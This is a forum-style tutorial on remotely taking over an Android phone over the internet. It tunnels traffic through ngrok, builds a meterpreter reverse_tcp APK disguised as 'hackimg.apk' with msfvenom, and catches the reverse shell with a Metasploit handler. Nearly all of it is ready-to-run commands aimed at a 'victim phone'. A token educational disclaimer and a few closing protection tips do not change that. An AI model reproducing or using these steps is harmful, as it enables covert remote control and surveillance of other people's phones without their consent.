Hack Android Using Ngrok Over The Internet!

Hack Android phone Over internet or a WAN without Port forwarding.For this purpose we need to create a tunnel between your phone and victim phone. To do this we have to use Ngrok . Yes! Ngrok will provide a TCP tunnel between two parties.

Devices and Tools:

  • A (non-rooted) Samsung Galaxy J2 Pro with a 16GB microSD card connected to my wireless network.
  • Termux Application in my Android Phone.
  • Metasploit Framework.
  • Mi Phone it will act as a Victim Phone.
  • Ngrok

Disclaimer: This post is for educational purpose only Do not try this on any individual phone. All the tests I have done on my own phone.

Getting Started:

1. Install Ngrok in Termux:

Below Screenshot is my Ngrok Dashboard. Here this will provide you a token and it will act as Authorization for your TCP tunnel.

Download Link : Ngrok file

After downloading the file extract it and save it in Internal storage of your android phone /sdcard/ngrok/ngrok

Note: Rename the file ngrok from ngrok-stable-linux-arm

1

cp /sdcard/ngrok/ngrok $HOME : Copy the ngrok file in Home.

chmod +x ngrok : It means that you want to make file executeable.

cd… : When you type this command you will see two directory Home & Usr.

cp home/ngrok usr/bin : Copying the file from Home to Usr directory

After typing the above commands type ls and your ngrok file will added in user directory.

2

./ngrok authtoken

ngrok tcp 4444

3

Port forwarding is completed and now its time to create a payload.

2. Create a Payload in Metasploit:

cd metasploit-framework
./msfvenom -p android/meterpreter/reverse_tcp LHOST=“Copy from Ngrok’s Session” LPORT=“Copy from Ngrok’s Session” R > /sdcard/hackimg.apk
LHOST= 0.tcp.ngrok.io
LPORT= 12345

I am taking it as an example you can type a given value near the 0.tcp.ngrok.io.

3. Use Metasploit Framework:

./msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost Localhost
set lport 4444
exploit

Some Useful Commands in Metasploit Exploit Section:

A drawback with this method, you can’t get multiple meterpreter sessions over a single port. for multiple sessions, you have to follow all the steps all over again with a different port.

How you can protect yourself?

  • Only install apps and software from the google play store.
  • Make sure you don’t have to enable installs from unknown sources enabled.
  • Keep your phone with you at all times.
  • Avoid opening any suspicious links in emails or messages.

ENJOY! :+1:

7 Likes